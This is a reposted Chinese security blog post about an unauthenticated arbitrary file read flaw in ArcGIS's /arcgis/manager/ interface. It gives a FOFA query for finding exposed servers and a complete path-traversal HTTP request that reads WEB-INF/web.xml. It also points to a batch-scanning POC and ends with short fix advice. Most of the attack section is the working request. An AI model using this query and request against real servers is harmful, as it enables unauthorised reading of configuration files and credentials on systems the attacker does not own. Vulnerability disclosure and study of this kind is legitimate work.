ArcGIS地理空间平台manager任意文件读取漏洞

admin 2024年11月26日11:11:07评论54 views字数 852阅读2分50秒阅读模式

免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

ArcGIS地理空间平台manager任意文件读取漏洞
简介
ArcGIS是由美国Esri公司开发的一款地理信息系统(GIS)软件,融合了数据库技术、软件工程、人工智能、网络技术以及云计算等先进的IT技术,旨在为用户提供一整套全面的、开放的企业级GIS解决方案。它包括一个具有图形用户界面的Windows桌面应用程序,可以支持从基础到复杂的各种GIS任务,如地图制作、空间分析、数据编辑与管理、可视化以及空间数据处理等。
ArcGIS地理空间平台manager任意文件读取漏洞
ArcGIS地理空间平台manager任意文件读取漏洞
漏洞描述
在 ArcGIS 地理信息系统的/arcgis/manager/接口处存在任意文件读取漏洞,未授权的攻击者可以利用该漏洞获取系统中的关键文件,例如数据库配置文件和系统配置文件等。
ArcGIS地理空间平台manager任意文件读取漏洞
fofa语法
app="esri-ArcGIS"
ArcGIS地理空间平台manager任意文件读取漏洞
漏洞复现
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closePriority: u=0, i
ArcGIS地理空间平台manager任意文件读取漏洞
批量检测(批量检测POC工具请在公众号知识星球获取):
ArcGIS地理空间平台manager任意文件读取漏洞
ArcGIS地理空间平台manager任意文件读取漏洞
修复建议
1、限定文件的访问范围
2、验证输入路径
3、标准化文件路径
网安交流群
ArcGIS地理空间平台manager任意文件读取漏洞

原文始发于微信公众号(白帽攻防):【漏洞复现】ArcGIS地理空间平台manager任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月26日11:11:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ArcGIS地理空间平台manager任意文件读取漏洞https://cn-sec.com/archives/3438383.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息